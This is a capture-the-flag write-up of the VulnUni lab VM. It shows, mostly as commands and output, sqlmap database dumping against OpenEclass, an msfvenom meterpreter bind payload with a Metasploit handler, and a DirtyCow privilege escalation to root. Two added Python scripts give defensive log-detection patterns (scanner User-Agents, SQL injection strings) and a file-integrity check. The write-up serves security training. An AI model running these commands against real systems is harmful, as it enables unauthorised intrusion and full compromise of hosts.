VulnUni CTF Write-Up

Overview

Getting Started

root@kali$ arp-scan -I eth1 -l
Interface: eth1, type: EN10MB, MAC: 00:50:56:3e:70:2d, IPv4: 192.168.8.131
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.8.1     00:50:56:c0:00:01       VMware, Inc.
192.168.8.132   00:0c:29:bc:43:d1       VMware, Inc.
192.168.8.254   00:50:56:e7:01:af       VMware, Inc.

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.991 seconds (128.58 hosts/sec). 3 responded
root@kali$ nmap -sV -A -O 192.168.8.132
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-08 20:45 EDT
Nmap scan report for 192.168.8.132
Host is up (0.00077s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: VulnUni - We train the top Information Security Professionals
MAC Address: 00:0C:29:BC:43:D1 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.77 ms 192.168.8.132

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Website Enumeration

root@kali$ dirbuster
root@kali$ zaproxy

root@kali$ searchsploit GUnet
--------------------------------------------- ---------------------------------
 Exploit Title                               |  Path
                                             | (/usr/share/exploitdb/)
--------------------------------------------- ---------------------------------
GUnet OpenEclass 1.7.3 E-learning platform   | exploits/php/webapps/48163.txt
GUnet OpenEclass E-learning platform 1.7.3   | exploits/php/webapps/48106.txt
--------------------------------------------- ---------------------------------
Shellcodes: No Result
root@kali$ searchsploit -m 48163
root@kali$ searchsploit -m 48106

SQL Injection

root@kali$ sqlmap -r eclasstestlogin --level=5 --risk=3 -v
root@kali$ sqlmap -r eclasstestlogin -v --current-db
root@kali$ sqlmap -r eclasstestlogin -v -D eclass --dump
root@kali$ sqlmap -r eclasstestlogin -v -D eclass -T user --dump
root@kali$ msfvenom -p php/meterpreter/bind_tcp LHOST=192.168.8.130 LPORT=4448 R > bind-meterpreter.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1338 bytes

root@kali$ zip bind-meterpreter bind-meterpreter.php
  adding: bind-meterpreter.php (deflated 62%)
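From the defender's side, the two steps above leave distinct traces in the web server's access log: the sqlmap run advertises itself in the User-Agent header unless that header is overridden, injection payloads sent via GET appear URL-encoded in the request line, and a PHP file unpacked under the course-content tree gets requested by its full path. The following Python script is an added example, not part of the original write-up, that runs three such rules over Apache combined-format log lines. The log lines, the login URL and the course path are constructed for the example; the rules are illustrative starting points rather than a complete ruleset.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format; only the fields the rules need are captured.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Detection rules (constructed for this example): a self-identifying scanner
# User-Agent, SQL metacharacters/keywords reaching the login endpoint, and
# server-side code being requested from the course-upload tree.
SCANNER_UA = re.compile(r"sqlmap|nikto|dirbuster", re.I)
SQLI_IN_QUERY = re.compile(r"'|\bunion\b.*\bselect\b|\bsleep\s*\(|\bbenchmark\s*\(|--\s", re.I)
LOGIN_ENDPOINT = re.compile(r"/login\.php", re.I)          # assumed login URL
CODE_IN_UPLOAD_DIR = re.compile(r"/courses/.*\.(php|phtml|phar)(\?|$)", re.I)

# Constructed sample log: a normal login, a sqlmap POST (body is not logged,
# so only the UA gives it away), a GET-based probe, a hit on a PHP file under
# courses/, and a benign course download.
SAMPLE_LOG = """\
192.168.8.131 - - [12/May/2020:00:40:01 -0400] "POST /eclass/modules/auth/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.8.131 - - [12/May/2020:00:41:10 -0400] "POST /eclass/modules/auth/login.php HTTP/1.1" 200 5120 "-" "sqlmap/1.4.4#stable (http://sqlmap.org)"
192.168.8.131 - - [12/May/2020:00:41:11 -0400] "GET /eclass/modules/auth/login.php?uname=admin'%20AND%20SLEEP(5)--%20&pass=x HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.8.131 - - [12/May/2020:00:43:40 -0400] "GET /eclass/courses/tmpUnzipping/bind-meterpreter.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.8.50 - - [12/May/2020:00:45:00 -0400] "GET /eclass/courses/TMA101/lecture1.pdf HTTP/1.1" 200 88231 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the captured fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the list of rule names that fire for one parsed entry."""
    findings = []
    path = unquote(entry["path"])  # decode %27, %20 etc. before matching
    if SCANNER_UA.search(entry["ua"]):
        findings.append("scanner-user-agent")
    if LOGIN_ENDPOINT.search(path) and SQLI_IN_QUERY.search(path):
        findings.append("sqli-probe-on-login")
    if CODE_IN_UPLOAD_DIR.search(path):
        findings.append("php-in-upload-dir")
    return findings


def analyze(log_text):
    """Run every rule over every parseable line; return (rule, ip, path, status) tuples."""
    alerts = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if not entry:
            continue
        for rule in classify(entry):
            alerts.append((rule, entry["ip"], entry["path"], entry["status"]))
    return alerts


if __name__ == "__main__":
    for rule, ip, path, status in analyze(SAMPLE_LOG):
        print(f"{rule:22} {ip:15} {status} {path}")
```

The POST line shows the limit of access-log detection for a `sqlmap -r` run: the injected values travel in the request body, which the combined format does not record, so the User-Agent (or a burst of same-size POSTs to the login page) is what remains. Logging request bodies at the application or WAF layer, and treating any `.php` under a content directory as an incident, closes that gap.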

Target Infiltration

root@kali$ msfconsole
msf5 > use multi/handler
msf5 exploit(multi/handler) > set LHOST 192.168.8.130
LHOST => 192.168.8.130
msf5 exploit(multi/handler) > set RHOST 192.168.8.132
RHOST => 192.168.8.132
msf5 exploit(multi/handler) > set LPORT 4448
LPORT => 4448
msf5 exploit(multi/handler) > set payload php/meterpreter/bind_tcp
payload => php/meterpreter/bind_tcp

msf5 exploit(multi/handler) > run
[*] Started bind TCP handler against 192.168.8.132:4448
[*] Sending stage (38288 bytes) to 192.168.8.132
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.8.132:4448) at 2020-05-12 00:43:47 -0400

meterpreter > shell
Process 2181 created.
Channel 1 created.
export TERM=xterm
export SHELL=bash
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@vulnuni:/$

www-data@vulnuni:/home/vulnuni$ ls
ls
Desktop    Downloads  Pictures  Templates  examples.desktop
Documents  Music      Public    Videos     flag.txt
www-data@vulnuni:/home/vulnuni$ cat flag.txt
cat flag.txt
68fc668278d9b0d6c3b9dc100bee181e

root@kali:~/Desktop# gcc -pthread cowroot.c -o cowroot
cowroot.c: In function 'procselfmemThread':
cowroot.c:98:17: warning: passing argument 2 of 'lseek' makes integer from pointer without a cast [-Wint-conversion]
   98 |         lseek(f,map,SEEK_SET);
      |                 ^~~
      |                 |
      |                 void *
In file included from cowroot.c:27:
/usr/include/unistd.h:334:41: note: expected '__off_t' {aka 'long int'} but argument is of type 'void *'
  334 | extern __off_t lseek (int __fd, __off_t __offset, int __whence) __THROW;
      |                                 ~~~~~~~~^~~~~~~~
cowroot.c: In function 'main':
cowroot.c:135:5: warning: implicit declaration of function 'asprintf'; did you mean 'vsprintf'? [-Wimplicit-function-declaration]
  135 |     asprintf(&backup, "cp %s /tmp/bak", suid_binary);
      |     ^~~~~~~~
      |     vsprintf
cowroot.c:139:5: warning: implicit declaration of function 'fstat' [-Wimplicit-function-declaration]
  139 |     fstat(f,&st);
      |     ^~~~~

meterpreter > shell
Process 2241 created.
Channel 0 created.
export TERM=xterm
export SHELL=bash
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@vulnuni:/var/www/vulnuni-eclass/courses/tmpUnzipping$ ./cowroot
./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 42824
Racing, this may take a while..
/usr/bin/passwd overwritten
Popping root shell.
Don't forget to restore /tmp/bak
thread stopped
thread stopped
root@vulnuni:/var/www/vulnuni-eclass/courses/tmpUnzipping# cat /root/flag.txt
cat /root/flag.txt
ff19f8d0692fe20f8af33a3bfa6635dd
root@vulnuni:/var/www/vulnuni-eclass/courses/tmpUnzipping# whoami
whoami
root
root@vulnuni:/var/www/vulnuni-eclass/courses/tmpUnzipping# id
id
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
root@vulnuni:/var/www/vulnuni-eclass/courses/tmpUnzipping#
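The escalation above leaves three artifacts on disk that a file-integrity check catches without any knowledge of the exploit: a SUID binary (/usr/bin/passwd) whose content no longer matches its baseline hash, a copy of the original left in /tmp/bak, and a PHP file sitting under the course-content tree. The script below is an added example, not code from the write-up, that builds a hash baseline of a directory tree, then re-scans it and reports modified, added and removed files plus any server-side code under a content directory. The tree, the file contents and the `courses` directory name are constructed stand-ins for the demo.

```python
import hashlib
import tempfile
from pathlib import Path

# Assumed policy for this example: top-level trees that hold user data and
# must never contain executable web code.
CONTENT_DIRS = ("courses",)
CODE_SUFFIXES = {".php", ".phtml", ".phar"}


def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 so large binaries are not read at once."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict:
    """Map every regular file under root (POSIX path relative to root) to its hash."""
    return {p.relative_to(root).as_posix(): sha256_of(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def compare(root: Path, baseline: dict) -> dict:
    """Re-scan root and diff it against a previously saved baseline."""
    current = build_baseline(root)
    return {
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
        # Code under a content tree is reported even if it was in the baseline,
        # since the policy says it should never be there at all.
        "code_in_content_dir": sorted(
            p for p in current
            if p.split("/")[0] in CONTENT_DIRS and Path(p).suffix.lower() in CODE_SUFFIXES),
    }


def _write(root: Path, rel: str, data: bytes) -> None:
    path = root / rel
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_bytes(data)


def demo() -> dict:
    """Constructed scenario mirroring the traces in the write-up: baseline a
    clean tree, then overwrite the SUID binary, leave a backup in tmp/ and
    unpack a PHP payload under courses/."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        _write(root, "usr/bin/passwd", b"ELF-original-passwd")        # stand-in content
        _write(root, "courses/TMA101/lecture1.pdf", b"%PDF-1.4 lecture")
        baseline = build_baseline(root)

        _write(root, "usr/bin/passwd", b"ELF-replaced-by-exploit")
        _write(root, "tmp/bak", b"ELF-original-passwd")
        _write(root, "courses/tmpUnzipping/bind-meterpreter.php", b"<?php /* payload */ ?>")
        return compare(root, baseline)


if __name__ == "__main__":
    for key, paths in demo().items():
        print(f"{key}: {paths}")
```

On a Debian or Ubuntu host the same check for packaged binaries already exists as `dpkg --verify`, which compares installed files against the package database's recorded checksums; a baseline of your own, as above, additionally covers the web root and other unpackaged paths. The durable fix for the kernel race itself is a patched kernel; the integrity check only tells you after the fact that the binary was replaced.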


🎓 M.A. Candidate @GeorgetownCSS Tech/Security/Eastern Europe | Adversary Simulation and Penetration Testing @Deloitte | 🥍 @PennStateMLax Alum

Tyler Butler
